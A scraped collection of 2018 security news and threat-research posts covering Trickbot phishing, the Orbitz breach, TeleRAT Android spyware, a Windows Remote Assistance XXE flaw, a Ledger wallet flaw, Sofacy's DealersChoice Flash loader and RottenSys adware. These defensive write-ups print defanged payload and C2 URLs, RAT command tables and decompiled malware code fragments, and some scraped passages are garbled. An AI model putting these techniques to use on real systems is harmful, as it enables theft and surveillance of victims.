Security Alert: New Spam Campaign Delivers Trickbot Payload, Spoofs Dropbox

You may remember Trickbot, the financial Trojan that made its appearance in the past targeting a lot of US banking companies, including big names like PayPal. Authors of Trickbot are persistent and continue to find new ways to harvest users’ valuable data. Recently, researchers discovered this spam email campaign in which malicious actors have decided to resort to spoofing Dropbox.

Security researchers analyzed a new spam email campaign delivering the Trickbot malware that claims to come from the legitime Dropbox website but actually coming from a look-a-like site.

The unwanted email is delivered with the following details (sanitized for your own protection):

From: Dropbox 

Subject line:

A new document is available for download



Your company administrator has uploaded a secure document for you or your company.

Your ID: [email adress]

Your unique download key: 6M4V74YEVMDHGR

This string of letters and numbers is a unique ID for the document you received.

To view or print the document please click here [link til dropboxsec[.]com]

The document associated with this unique ID opens. You can now sign, download and save, print, and perform “More” actions on the document, depending on the permissions the sender has given you.

Please contact your administrator for more information.


– The Dropbox Team>

How the infection happens

If a user is being lured into clicking on the malicious link, then a specially crafted and harmful document is delivered, via the following URL that could look like this one:

https: [//] dropboxsec [.] net / 6M4V74YEVMDHGR. doc

If the macro code in the malicious Word document is enabled by an invisible recipient, Trickbot will be retrieved from the following URLs (sanitized for your own safety)

http: // techknowlogix [.] net / farestod.png
Http: // [.] ve / farestod.png

This TrickBot variant is linked to the main bot that has the id (given group tag) “tt0002”, and the version number 1000147. It comes with several modules, including configuration files in an encrypted form.

With the help of a COM server, it creates a “task” that can execute the Trickbot payload after a restart of the machine via  “AppData Roaming % client_id%”.

Trickbot uses the API “GetNativeSystemInfo” or “wProcessorArchitecture” as it uses to determine whether it is 32-bit or 64-bit environment / CPU.

Here’s how the configuration file showing the previously mentioned C&C servers is displayed. These servers are used by malicious actors to maintain communications with compromised systems:

1000000 </ ver>
tt0002 </ gtag>

[C & C: [port]]
</ Servs>

</ Autorun>
</ Mcconf>

Heimdal Security proactively blocked these infected domains (and malicious emails), so all Heimdal PRO and Heimdal CORP users are protected.

According to VirusTotal, only 17 antivirus products out of 56 have managed to detect this spam email campaign at the time we write this security alert.

VirusTotal analysis

How to stay safe from banking trojans

Trickbot is known for its banking trojan features and the various ways used by cyber criminals to steal users’ personal information and harvest their sensitive data.

We recommend you:

  • Always have your operating system, and all your apps and other software programs, updated because it’s the first place where malicious actors look to exploit flaws.
  • Once again, we urge you: don’t open emails or click on suspicious files/attachments;
  •  Keep a backup with all your important data on external sources like a hard drive or in the cloud (Google Drive, Dropbox, etc.) to store it. This guide shows you how to learn how to do it;
  • Setting up a good, strong password is one of the best cybersecurity advice coming from security experts, and this security guide comes in handy;
  • Try to run software programs with non-administrative user accounts and remember to disable macros in the Microsoft Office package;
  • Make sure you have a reliable antivirus program installed on your PC to protect your valuable data from online threats;*This article features cyber intelligence provided by CSIS Security Group researchers.

The post Security Alert: New Spam Campaign Delivers Trickbot Payload, Spoofs Dropbox appeared first on Heimdal Security Blog.

Go to Source
Author: Ioana Rijnetu

Expedia’s Orbitz Says 880,000 Payment Cards Compromised in Security Breach

Chicago-based online travel booking company Orbitz, a subsidiary of Expedia, reveals that one of its old websites has been hacked, exposing nearly 880,000 payment card numbers of the people who made purchases online.

The data breach incident, which was detected earlier this month, likely took place somewhere between October 2016 and December 2017, potentially exposing customers’ information to hackers.

According to the company, hackers may have accessed payment card information stored on a consumer and business partner platform, along with customers’ personal information, including name, address, date of birth, phone number, email address and gender.

Orbitz worked closely with cybersecurity experts and law enforcement to investigate the breach and confirms that the social security numbers for U.S. customers were not exposed in this incident.

The company claims to have enhanced the security of its compromised platform, though it assures its customers that the current website was not impacted.

“We deeply regret the incident, and we are committed to doing everything we can to maintain the trust of our customers and partners,” Orbitz said in a statement.

Orbitz is currently working to notify the thousands of affected customers and plans to offer one year of free credit monitoring and identity protection service.

Since the payment card information is now in the hands of cybercriminals, customers are advised to closely monitor their credit card statements and report any unauthorised charges to the issuing bank.

Go to Source

TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users


Telegram Bots are special accounts that do not require an additional phone number to setup and are generally used to enrich Telegram chats with content from external services or to get customized notifications and news. And while Android malware abusing Telegram’s Bot API to target Iranian users is not fresh news (the emergence of a Trojan using this method called IRRAT was discussed in June and July 2017), we set out to investigate how these Telegram Bots were being abused to command and control malicious Android applications.

This blog details our findings navigating through some Operational Security (OPSEC) fails while sifting through multiple malicious APK variants abusing Telegram’s Bot API; including the discovery of a new Trojan we’ve named “TeleRAT”. TeleRAT not only abuses Telegram’s Bot API for Command and Control (C2), it also abuses it for data exfiltration, unlike IRRAT.

What We Already Know- IRRAT

Based on previous reports, we know Telegram’s Bot API was already being employed by attackers to steal information ranging from SMS and call history to file listings from infected Android devices. The majority of the apps we saw disguise themselves as an app that tells you how many views your Telegram profile received – needless to say, the information provided is inaccurate as Telegram doesn’t allow for populating any such information.

We continue to see IRRAT active in the wild to this date.

We used the below sample for this analysis.

SHA256 1d0770ac48f8661a5d1595538c60710f886c254205b8cf517e118c94b256137d

TeleRAT works by creating and then populating the following files on the phone’s SD Card and sending them to the upload server, after the app’s first launch:

  • “[IMEI] numbers.txt”: Contact information
  • “[IMEI]acc.txt”: List of Google accounts registered on the phone
  • “[IMEI]sms.txt”: SMS history
  • 1.jpg: Picture taken with the front-facing camera
  • Image.jpg: Picture taken with back-facing camera

Finally, it reports back to a Telegram bot (identified by a bot ID hardcoded in each RAT’s source code) with the below beacon, and the application icon is then hidden from the phone’s app menu:

hxxp://[APIKey]/sendmessage?chat_id=[ChatID]?text=نصب جدیدn [IMEI] nIMEI : :[IMEI]nAndroid ID : [AndroidID]nModel : [PhoneModel]n[IP] nnIMEI دستگاه: [IMEI]

In the background, the app continues to beacon to the Telegram bot at regular intervals and listens for certain commands, as detailed below.

Command Action Communication to Telegram bot
call@[IMEI]@[Number] Places a call to [Number] hxxps://[APIKey]/sendmessage?chat_id=[ChatID]&text=call with [Number]
sms@[IMEI]@[Number]@[Text] SMS [Text] to [Number] hxxps://[APIKey] /sendmessage?chat_id=[ChatID]&text=sent
getapps@[IMEI] Saves a list of installed apps to SD Card to file named  “[IMEI] apps.txt”, uploads to upload server None
getfiles@[IMEI]@[DirPath] Retrieves file listing from [DirPath], saves to SD Card as “[IMEI]files.txt”, uploads to server None
getloc@[IMEI] Starts a GPS listener that monitors location changes None
upload@[IMEI]@[FilePath] Uploads file at [FilePath] None
removeA@[IMEI]@[FilePath on SDCard] Deletes file at [FilePath on SDCard][APIKey]/sendmessage?chat_id=[ChatID]&text= ______________[FilePath on SDCard]
removeB@[IMEI]@[DirPath on SDCard] Deletes [DirPath on SDCard] None
lstmsg@[IMEI] Saves SMS history to SD Card as ”[IMEI]lstmsg.txt”, uploads to server None
yehoo@[IMEI] Takes a picture with Front Camera, saves to SD Card as “yahoo.jpg”, uploads to server None

1: List of IRRAT bot commands

As the table above shows, this IRRAT sample makes use of Telegram’s bot API solely to communicate commands to infected devices. The stolen data is uploaded to third party servers, several of which employ a webhosting service. Fortunately for us, these servers had several OPSEC fails. More on that further below.

A New Family- TeleRAT

While sifting through IRRAT samples, using AutoFocus, we came across another family of Android RATs seemingly originating from and/or targeting individuals in Iran that not only makes use of the Telegram API for C2 but also for exfiltrating stolen information.


Figure 1: pivoting in autofocus for applications using the Telegram bot API

We named this new family “TeleRAT” after one of the files it creates on infected devices.

We used the below sample for this analysis.

SHA256 01fef43c059d6b37be7faf47a08eccbf76cf7f050a7340ac2cae11942f27eb1d

Post-installation TeleRAT creates two files in the app’s internal directory:

  • telerat2.txt containing a slew of information about the device – including the System Bootloader version number, total and available Internal and External memory size, and number of cores.
  • thisapk_slm.txt mentioning a Telegram channel and a list of commands. We investigate this Telegram channel is greater detail further below.

The RAT announces its successful installation to the attackers by sending a message to a Telegram bot via the Telegram Bot API with the current date and time.

More interestingly, it starts a service that listens for changes made to the Clipboard in the background.


Figure 2: Code snippet that listens for clipboard changes

Finally, the app fetches updates from the Telegram bot API every 4.6 second, listening for the following commands (we used Google Translate for the below Farsi (Persian) translations):


Command Translation
دریافت مخاطبین Get contacts
دریافت کلیپ بورد Get the clipboard
Clipboard set:[text]
دریافت مکان Get location
دریافت اطلاعات شارژ Receive charging information
All file list:/[path]
Root file list:/[path]
دریافت برنامه ها Get apps
SetWallpaper http[URL]
دریافت پیام ها Receive (SMS) messages
گرفتن عکس1 Take photo 1 (front camera)
گرفتن عکس2 Take photo 2 (back camera)
دریافت وضعیت Get status
دریافت تماس ها Receive calls
سایلنت Silent (set to Vibrate mode)
صدادار Loud (set to normal Ringer mode)
بیصدا Silent (set to Silent mode)
Blacksc Blacks out phone screen
Blackscf Clears black screen
ضبط فیلم Audio recording (saves recorded audio to AUDIO123/MUSIC/rec123.m4a on SD Card)
توقف ضبط فیلم Stop audio recording
راهنمای دستورات Instruction manual (Help Menu)
call to [number]
RESET (deletes thisapk_slm.txt and sends a new registration message to Telegram bot)
دریافت گالری Get gallery (sends files from the /Dcim folder on the SD Card to Telegram bot)
Delete app files or دریافت گالری
Vibrate [x] (Causes phone to vibrate for x seconds, with a maximum value of 600 secs)
لرزش کم Low vibration (for a duration of 150 secs)
لرزش متوسط Medium vibration (350 secs)
لرزش زیاد Shake too much (600 secs)

2: List of TeleRAT bot commands

Aside from additional commands, this new family’s main differentiator to IRRAT is that it also uploads exfiltrated data using Telegram’s sendDocument API method.


Figure 3: Code snippet showing the use of the SendDocument Telegram bot API method

TeleRAT is an upgrade from IRRAT in that it eliminates the possibility of network-based detection that is based on traffic to known upload servers, as all communication (including uploads) is done via the Telegram bot API. However, it still leaves other doors open via Telegram’s bot API, since the API Keys are hardcoded in the APKs.

The API allows fetching updates by two means:

1.The getUpdates method: Using this exposes a history of all the commands that were sent to the bot, including usernames from which the commands originated. From the bots that were still responding and had an update history (incoming updates are only kept for 24 hours as per Telegram’s policy), we were able to find bot commands originating from four Telegram accounts, shown below.


Figure 4: Telegram usernames revealed from bot command histories

2. Using a Webhook: Telegram allows redirecting all bot updates to a URL specified by means of a Webhook. Their policy limits these Webhooks to HTTPS URLs only. While most of the Webhooks we found used certificates issued by Let’s Encrypt with no specific registrar information, some of them led us back to the world of third party webhosting and open directories. Let’s Encrypt has been notified about this activity.

A sample of only a few Webhooks we found are shown below. hxxps://mr-mehran[.]tk/pot/Bot/ in particular appears to be hosting close to 6500 bots, however, we can’t confirm whether they’re all used for malicious purposes.


Figure 5: Webhooks found associated with some TeleRAT bots

OPSEC Fails, Distribution Channels & Attribution

In our research we were able find what was clearly an image of the botmaster testing out the RAT, based on the Telegram bot interface that can be seen on the monitor pictured in the lower half of Figure 6.


Figure 6: Image of botmaster testing out the RAT

We were also able to find exfiltrated messages that confirmed our theory about the test run and reveals a thread in Persian Farsi seemingly discussing bot setup.

“صبح ساعت ۶ انلاین شو تا روباته رو امتحان کنیم”

Google Translation: “Morning 6 hours online to try the robotage

While investigating attribution for TeleRAT, we noticed the developers made no effort to hide their identities in the code. One username is seen in the screenshot below.


Figure 7: Telegram channel advertised in source code

Looking further into the ‘vahidmail67’ Telegram channel, we found advertisements for applications and builders that ran the entire gamut – from applications that get you likes and followers on Instagram, to ransomware, and even the source code for an unnamed RAT (complete with a video tutorial, shown below).


Figure 8: Screenshot from a Telegram channel advertising & sharing a RAT source code

Aside from the Telegram channel, while looking for references to certain TeleRAT components we stumbled upon some threads on an Iranian programmers’ forum advertising the sale of a Telegram bot control library. The forum is frequented by some of the developers whose code is heavily reused in a big portion of the TeleRAT samples we came across.


Figure 9: Advertisement for sale of a Telegram bot control library

The forum goes the extra mile to mention all content is in accordance with Iran’s laws. However, it’s hard to see any non-malicious use for some of the code advertised there or written by developers that frequent it – for instance, a service that runs in the background listening for changes to the Clipboard (pictured in the code snippet in Figure 3 further above).


Figure 10: Forum Disclaimer

Overall, TeleRAT pieces together code written by several developers, however, due to freely available source code via Telegram channels and being sold on forums, we can’t point to one single actor commanding either IRRAT or TeleRAT and it appears to be the work of several actors possibly operating inside of Iran.


As we investigated these RATs, we also started looking at how victims were getting infected. Further investigating, we witnessed several third-party Android application stores distributing seemingly legitimate applications like “Telegram Finder”, which supposedly helps users locate and communicate with other uses with specific interests, like knitting. Also, we’ve witnessed several samples distributed and shared via both legitimate and nefarious Iranian Telegram channels.


Figure 11: leIranian third-party application store

Looking closer at the malicious APKs we were able to get an understanding of common application naming conventions and functionality across the board.


Figure 12: ‘Telegram finder’ application

Based on the samples we analysed, the three most common application names for both IRRATand TeleRAT are:

Native App Name Translated App Name
پروفایل چکر Profile Cheer
بازدید یاب تلگرام Telegram Finder
telegram hacker N/A

Additionally, there were several malicious APKs disguised as fake VPN software and/or configuration files, such as “atom vpn” and “vpn for telegram.

There appears to be a total identified victim count of 2,293 at the time of writing, based on the infrastructure we analysed. There appears to be a rather small range of geographically dispersed victims, with 82% of having Iranian phone numbers.

Iran 1894
Pakistan 10
India 227
Afghanistan 109
United Kingdom 53

There may also be additional infrastructure or variants we were unaware of at the time of writing. That said, the number of victims likely residing within Iran far exceeds the victim count for any other country.


Part of dissecting and understanding new threats involve looking closer at already established campaigns and malware variants. This is a perfect example of just that; looking closer at a previously established malware family to better understand it’s current and possibly changed capabilities.

While malware leveraging the Telegram bot API is not necessarily new, we were able to identify a new family, TeleRAT, hiding entirely behind Telegram’s API to evade network-based detection and exfiltrate data. Leveraging intelligence from AutoFocus, accessible attacker infrastructure, and other open source intelligence we were able to paint an accurate picture of an ongoing operation leveraging Telegram’s API and targeting users via third party application sites and social media channels.

Taking some basic precautions can help users protect themselves from malicious applications like TeleRAT, such as:

  • Avoid third-party application stores or sources.
  • Don’t allow application sideloading on your device.
  • Ensure the application you are installing is official, regardless of source.
  • Closely review and scrutinize application permission requests prior to installation.

Palo Alto Networks customers are protected from this threat by:

  1. WildFire detects all TeleRAT and IRRAT files with malicious verdicts.
  2. AutoFocus customers can track these samples with the IRRAT and TeleRAT
  3. Traps blocks all of the APK files associated with TeleRAT and IRRAT.


Telegram usernames found commanding IRRAT or TeleRAT



hxxps://ربات ساز/CreateBotAll.php

The post TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users appeared first on Palo Alto Networks Blog.

Go to Source
Author: Ruchna Nigam

Windows Remote Assistance Exploit Lets Hackers Steal Sensitive Files

You have always been warned not to share remote access to your computer with untrusted people for any reason—it’s a basic cybersecurity advice, and common sense, right?

But what if, I say you should not even trust anyone who invites or offer you full remote access to their computers.

A critical vulnerability has been discovered in Microsoft’s Windows Remote Assistance (Quick Assist) feature that affects all versions of Windows to date, including Windows 10, 8.1, RT 8.1, and 7, and allows remote attackers to steal sensitive files on the targeted machine.

Windows Remote Assistance is a built-in tool that allows someone you trust to take over your PC (or you to take remote control of others) so they can help you fix a problem from anywhere around the world.

The feature relies on the Remote Desktop Protocol (RDP) to establish a secure connection with the person in need.

However, Nabeel Ahmed of Trend Micro Zero Day Initiative discovered and reported an information disclosure vulnerability (CVE-2018-0878) in Windows Remote Assistance that could allow attackers to obtain information to further compromise the victim’s system.

The vulnerability, which has been fixed by the company in this month’s patch Tuesday, resides in the way Windows Remote Assistance processes XML External Entities (XXE).

The vulnerability affects Microsoft Windows Server 2016, Windows Server 2012 and R2, Windows Server 2008 SP2 and R2 SP1, Windows 10 (both 32- and 64-bit), Windows 8.1 (both 32- and 64-bit) and RT 8.1, and Windows 7 (both 32- and 64-bit).

Exploiting Windows Remote Assistance to Steal Files


Since a security patch for this vulnerability is now available, the researcher has finally released technical details and proof-of-concept exploit code for the flaw to the public.

In order to exploit this flaw, which resides in MSXML3 parser, the hacker needs to use “Out-of-Band Data Retrieval” attack technique by offering the victim access to his/her computer via Windows Remote Assistance.

While setting up Windows Remote Assistance, the feature gives you two options—Invite someone to help you and Respond to someone who needs help.

Selecting the first option helps users generate an invitation file, i.e. ‘invitation.msrcincident,’ which contains XML data with a lot of parameters and values required for authentication.

Windows Remote Assistance Exploit

Since the parser does not properly validate the content, the attacker can simply send a specially crafted Remote Assistance invitation file containing a malicious payload to the victim, tricking the targeted computer to submit the content of specific files from known locations to a remote server controlled by the attackers.

“The stolen information could be submitted as part of the URL in HTTP request(s) to the attacker. In all cases, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action,” Microsoft explains.

“This XXE vulnerability can be genuinely used in mass scale phishing attacks targeting individuals believing they are truly helping another individual with an IT problem. Totally unaware that the .msrcincident invitation file could potentially result in loss of sensitive information,” Ahmed warns.

Among patching other critical vulnerabilities fixed this month, Windows users are highly recommended to install the latest update for Windows Remote Assistance as soon as possible.

Go to Source

15-Year-old Finds Flaw in Ledger Crypto Wallet

A 15-year-old security researcher has discovered a serious flaw in cryptocurrency hardware wallets made by Ledger, a French company whose popular products are designed to physically safeguard public and private keys used to receive or spend the user’s cryptocurrencies.

Ledger’s Nano-S cryptocurrency hardware wallet. Source: Amazon.

Hardware wallets like those sold by Ledger are designed to protect the user’s private keys from malicious software that might try to harvest those credentials from the user’s computer.  The devices enable transactions via a connection to a USB port on the user’s computer, but they don’t reveal the private key to the PC.

Yet Saleem Rashid, a 15-year-old security researcher from the United Kingdom, discovered a way to acquire the private keys from Ledger devices. Rashid’s method requires an attacker to have physical access to the device, and normally such hacks would be unremarkable because they fall under the #1 rule of security — namely, if an attacker has physical access to your device, then it is not your device anymore.

The trouble is that consumer demand for Ledger’s products has frequently outpaced the company’s ability to produce them (it has sold over a million of its most popular Nano S models to date). This has prompted the company’s chief technology officer to state publicly that Ledger’s built-in security model is so robust that it is safe to purchase their products from a wide range of third-party sellers, including Amazon and eBay.

Ledger’s message to users regarding the lack of anti-tampering mechanisms on its cryptocurrency hardware wallets.

But Rashid discovered that a reseller of Ledger’s products could update the devices with malicious code that would lie in wait for a potential buyer to use it, and then siphon the private key and drain the user’s cryptocurrency account(s) when the user goes to use it.

The crux of the problem is that Ledger’s devices contain a secure processor chip and a non-secure microcontroller chip. The latter is used for a variety of non-security related purposes, from handling the USB connections to displaying text on the Ledger’s digital display, but the two chips still pass information between each other. Rashid found that an attacker could compromise the insecure processor (the microcontroller) on Ledger devices to run malicious code without being detected.

Ledger’s products do contain a mechanism for checking to ensure the code powering the devices has not been modified, but Rashid’s proof-of-concept code — being released today in tandem with an announcement from Ledger about a new firmware update designed to fix the bug — allows an attacker to force the device to sidestep those security checks.

“You’re essentially trusting a non-secure chip not to change what’s displayed on the screen or change what the buttons are saying,” Rasheed said in an interview with KrebsOnSecurity. “You can install whatever you want on that non-secure chip, because the code running on there can lie to you.”

Kenneth White, director of the Open Crypto Audit Project, had an opportunity to review Rashid’s findings prior to their publication today. White said he was impressed with the elegance of the proof-of-concept attack code, which Rashid sent to Ledger approximately four months ago. A copy of Rashid’s research paper on the vulnerability is available here (PDF). A video of Rashid demonstrating his attack is below.

White said Rashid’s code subverts the security of the Ledger’s process for generating a backup code for a user’s private key, which relies on a random number generator that can be made to produce non-random results.

“In this case [the attacker] can set it to whatever he wants,” White said. “The victim generates keys and backup codes, but in fact those codes have been predicted by the attacker in advance because he controls the Ledger’s random number generator.”

Rashid said Ledger initially dismissed his findings as implausible. But in a blog post published today, Ledger says it has since fixed the flaw Rasheed found — as well as others discovered and reported by different security researchers — in a firmware update that brings Ledger Nano S devices from firmware version 1.3.1 to version 1.4.1 (the company actually released the firmware update on March 6, potentially giving attackers time to reverse engineer Rashid’s method).

The company is still working on an update for its pricier Ledger Blue devices, which company chief security officer Charles Guillemet said should be ready soon. Guillemet said Nano-S devices should alert users that a firmware update is available when the customer first plugs the device into a computer.

“The vulnerability he found was based on the fact that the secure element tries to authenticate the microcontroller, and that authentication is not strong enough,” Guillemet told KrebsOnSecurity. “This update does authentication more tightly so that it’s not possible to fool the user.”

Rasheed said unlike its competitors in the hardware wallet industry, Ledger includes no tamper protection seal or any other device that might warn customers that a Nano S has been physically opened or modified prior to its first use by the customer.

“They make it so easy to open the device that you can take your fingernail and open it up,” he said.

Asked whether Ledger intends to add tamper protection to its products, Guillemet said such mechanisms do not add any security.

“For us, a tamper proof seal is nothing that adds security to the device because it’s very easy to counterfeit,” Guillemet said. “You can buy some security seals on the web. For us, it’s a lie to our customers to use this kind of seal to prove the genuineness of our product.”

Guillemet said despite Rashid’s findings, he sees no reason to change his recommendation that interested customers should feel free to purchase the company’s products through third party vendors.

“As we have upgraded our solution to prove the genuineness of our product using cryptographic checks, I don’t see why we should change this statement,” he said.

Nevertheless, given that many cryptocurrency owners turn to hardware wallets like Ledger to safeguard some or all of their virtual currency, it’s probably a good idea if you are going to rely on one of these devices to purchase it directly from the source, and to apply any available firmware updates before using it.

Go to Source
Author: BrianKrebs

Powered by WPeMatico

Sofacy Uses DealersChoice to Target European Government Agency


Back in October 2016, Unit 42 published an initial analysis on a Flash exploitation framework used by the Sofacy threat group called DealersChoice. The attack consisted of Microsoft Word delivery documents that contained Adobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly provided by a command and control server. Sofacy continued to use DealersChoice throughout the fall of 2016, which we also documented in our December 2016 publication discussing Sofacy’s larger campaign.

On March 12 and March 14, we observed the Sofacy group carrying out an attack on a European government agency involving an updated variant of DealersChoice. The updated DealersChoice documents used a similar process to obtain a malicious Flash object from a C2 server, but the inner mechanics of the Flash object contained significant differences in comparison to the original samples we analyzed.

One of the differences was a particularly clever evasion technique: to our knowledge this has never been observed in use. With the previous iterations of DealersChoice samples, the Flash object would immediately load and begin malicious tasks. In the March attacks, the Flash object is only loaded if the user scrolls through the entire content of the delivery document and views the specific page the Flash object is embedded on. Also, DealersChoice requires multiple interactions with an active C2 server to successfully exploit an end system.

The overall process to result in a successful exploitation is:

  1. User must open the Microsoft Word email attachment
  2. User must scroll to page three of the document, which will run the DealersChoice Flash object
  3. The Flash object must contact an active C2 server to download an additional Flash object containing exploit code
  4. The initial Flash object must contact the same C2 server to download a secondary payload
  5. Victim host must have a vulnerable version of Flash installed

The Attack

The attack involving this updated variant of DealersChoice was targeting a European government organization. The attack relied on a spear-phishing email with a subject of “Defence & Security 2018 Conference Agenda” that had an attachment with a filename of “Defence & Security 2018 Conference Agenda.docx”. The attached document contains a conference agenda that the Sofacy group appears to have copied directly from the website for the “Underwater Defence & Security 2018 Conference” here.

Opening the attached “Defence & Security 2018 Conference Agenda.docx” file does not immediately run malicious code to exploit the system. Instead, the user must scroll to the third page of the document, which will load a Flash object that contains ActionScript that will attempt to exploit the user’s system to install a malicious payload. The Flash object embedded within this delivery document is a variant of an exploit tool that we call DealersChoice. This suggests that the Sofacy group is confident that the targeted individuals would be interested enough in the content to peruse through it.

We analyzed the document to determine the reason that the malicious Flash object only ran when the user scrolled to the third page. According to the document.xml file, the DealersChoice loader SWF exists after the “covert-shores-small.png” image file within the delivery document. This image file exists on the third page of the document, so the user would have to scroll down in the document to this third page to get the SWF file to run. The user may not notice the Flash object on the page, as Word displays it as a tiny black box in the document, as seen in Figure 1. This is an interesting anti-sandbox technique, as it requires human interaction prior to the document exhibiting any malicious activity.


Figure 1 Flash object appearing as a small black box in delivery document

Updated DealersChoice

This DealersChoice Flash object shares a similar process to previous variants; however, it appears that the Sofacy actors have made slight changes to its internal code. Also, it appears that the actors used ActionScript from an open source video player called “f4player”, which is freely available on GitHub with the following description:

f4Player is an open source flash (AS3) video player and library project. It is so small that it is only 10kb (with skin file) and totally free under GPL license.

The Sofacy developer modified the f4player’s ActionScript to include additional code to load an embedded Flash object. The additions include code to decrypt an embedded Flash object and an event handler that calls a newly added function (“skinEvent2”) that plays the decrypted object, as seen in the code snippet below:

var skinEvent2:Function = function(param1:Event):void
    skin2 = param1.currentTarget.content;
 var mov:Loader = new Loader();
 var b:ByteArray = new this.Mov();
 var k:uint = 82;
 var i:uint = 4;
 while(i < b.length)
    b[i] = b[i] ^ k;

The above code allows DealersChoice to load a second SWF object, specifically loading it with an argument that includes a C2 URL of “hxxp://ndpmedia24[.]com/0pq6m4f.m3u8”.

The embedded SWF extracts the domain from the C2 URL passed to it and uses it to craft a URL to get the server’s ‘crossdomain.xml’ file in order to obtain permissions to load additional Flash objects from the C2 domain. The ActionScript relies on event listeners to call specific functions when the event “Event.COMPLETE” is triggered after successful HTTP requests are issued to the C2 server. The event handlers call functions with the following names, which includes an incrementing number that represents the order in which the functions are called:

  • onload1
  • onload2
  • onload3
  • onload5

With these event handlers created, the ActionScript starts by gathering system data from the flash.system.Capabilities.serverString property (just like in the original DealersChoice.B samples) and issues an HTTP GET with the system data as a parameter to the C2 URL that was passed as an argument to the embedded SWF when it was initially loaded. When this HTTP request completes, the event listener will call the ‘onload1’ function.

The ‘onload1’ function parses the response data from the request to the C2 URL using regular expressions. According to the following code snippet, it appears the regular expression is looking for a hexadecimal string after “/” and before “/sec”, as well as any string between “/hls/” and “/tracks”:

var data:String =;
var p1:RegExp = //([0-9a-f]+)/sec/gim;
r1 = p1.exec(data);
var r2:Array = p1.exec(data);
var p2:RegExp = //hls/(.+)/tracks/gim;
var r3:Array = p2.exec(data);
r4 = p2.exec(data);

The regular expressions suggest that the C2 server responds with content that is meant to resemble HTTP Live Steaming (HLS) traffic, which is a protocol that uses HTTP to deliver audio and video files for streaming. The use of HLS coincides with the use of ActionScript code from the f4player to make the traffic seem legitimate. The variables storing the results of the regular expression matches are used within the ActionScript for further interaction with the C2 server. The following is a list of these variables and their purpose:

Variable Purpose
r1 Used as the decryption key for the downloaded SWF file. This will be a 16-byte hexadecimal string.
r2 Not used.
r3 Used as the URL within the HTTP request within onload1 function, specifically as the URL to get the malicious SWF file to exploit the system.
r4 Used as the URL within the HTTP request within onload2 function, specifically as the URL to get the payload to run after successful exploitation of the system.

The ‘onload1’ function then sends an HTTP GET request to the C2 domain using the value stored in the ‘r3’ variable as a URL. When this HTTP request completes, the event listener will call the ‘onload2’ function.

The ‘onload2’ function decrypts the response received from the HTTP request issued in ‘onload1’ function. It does so by calling a sub-function to decrypt the content, using the value stored in the ‘r1’ variable as a key. The sub-function to decrypt the content skips the first 4 bytes, suggesting that the first four bytes of the downloaded content is in cleartext (most likely the “FWS” or “CWS” header to look legitimate).

After decrypting the content, the ‘onload2’ function will issue another HTTP GET request with the system data as a parameter, but this time to the C2 using a URL from the ‘r4’ variable. When this request completes, the event listener will call the ‘onload3’ function.

The ‘onload3’ function will take the response to the HTTP request in ‘onload2’ and treat it as the payload. The ActionScript will read each byte of the C2 response and get the hexadecimal value of each byte and create a text array of 4-byte hexadecimal values with “0x” prepended and “,” appended to each using the following code:

sh = she + ("0x" + hex.substr(i + 6,2) + hex.substr(i + 4,2) + hex.substr(i + 2,2) + hex.substr(i,2) + ",");

This hexadecimal string will most likely be a string of shellcode that will contain and decrypt the ultimate portable executable (PE) payload. The string of comma separated hexadecimal values is passed as a parameter when loading the SWF file downloaded in ‘onload2’. This function creates an event listener for when the SWF file is successfully loaded, which will call the ‘onload5’ function.

The ‘onload5’ function is responsible for adding the newly loaded SWF object as a child object to the current running object using the following code:


This loads the SWF file, effectively running the malicious code on the system. During our analysis, we were unable to coerce the C2 into providing a malicious SWF or payload. As mentioned in our previous blogs on DealersChoice, the payload of choice for previous variants was SofacyCarberp (Seduploader), but we have no evidence to suggest this tool was used in this attack. We are actively researching and will update this blog in the event we discover the malicious Flash object and payload delivered in this attack.

Linkage to Prior Campaign

The delivery document used in this attack was last modified by a user named ‘Nick Daemoji’, which provides a linkage to previous Sofacy related delivery documents. The previous documents that used this user name were macro-laden delivery documents that installed SofacyCarberp/Seduploader payloads, as discussed in Talos’ blog. This overlap also points to a similar social engineering theme between these two campaigns, as both used content from upcoming military and defense conferences as a lure.


The Sofacy threat group continues to use their DealersChoice framework to exploit Flash vulnerabilities in their attack campaigns. In the most recent variant, Sofacy modified the internals of the malicious scripts, but continues to follow the same process used by previous variants by obtaining a malicious Flash object and payload directly from the C2 server. Unlike previous samples, this DealersChoice used a DOCX delivery document that required the user to scroll through the document to trigger the malicious Flash object. The required user interaction turned out to be an interesting anti-sandbox technique that we had not seen this group perform in the past.

Indicators of Compromise


0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7 (Defence & Security 2018 Conference Agenda.docx)


Macro-ladened documents




The post Sofacy Uses DealersChoice to Target European Government Agency appeared first on Palo Alto Networks Blog.

Go to Source
Author: Robert Falcone

Pre-Installed Malware Found On 5 Million Popular Android Phones

Security researchers have discovered a massive continuously growing malware campaign that has already infected nearly 5 million mobile devices worldwide.

Dubbed RottenSys, the malware that disguised as a ‘System Wi-Fi service’ app came pre-installed on millions of brand new smartphones manufactured by Honor, Huawei, Xiaomi, OPPO, Vivo, Samsung and GIONEE—added somewhere along the supply chain.

All these affected devices were shipped through Tian Pai, a Hangzhou-based mobile phone distributor, but researchers are not sure if the company has direct involvement in this campaign.

According to Check Point Mobile Security Team, who uncovered this campaign, RottenSys is an advanced piece of malware that doesn’t provide any secure Wi-Fi related service but takes almost all sensitive Android permissions to enable its malicious activities.

“According to our findings, the RottenSys malware began propagating in September 2016. By March 12, 2018, 4,964,460 devices were infected by RottenSys,” researchers said.

To evade detection, the fake System Wi-Fi service app comes initially with no malicious component and doesn’t immediately start any malicious activity.

Instead, RottenSys has been designed to communicate with its command-and-control servers to get the list of required components, which contain the actual malicious code.

RottenSys then downloads and installs each of them accordingly, using the “DOWNLOAD_WITHOUT_NOTIFICATION” permission that does not require any user interaction.

Hackers Earned $115,000 in Just Last 10 Days


At this moment, the massive malware campaign pushes an adware component to all infected devices that aggressively displays advertisements on the device’s home screen, as pop-up windows or full-screen ads to generate fraudulent ad-revenues.

“RottenSys is an extremely aggressive ad network. In the past 10 days alone, it popped aggressive ads 13,250,756 times (called impressions in the ad industry), and 548,822 of which were translated into ad clicks,” researchers said.

According to the CheckPoint researchers, the malware has made its authors more than $115,000 in the last 10 days alone, but the attackers are up to “something far more damaging than simply displaying uninvited advertisements.”

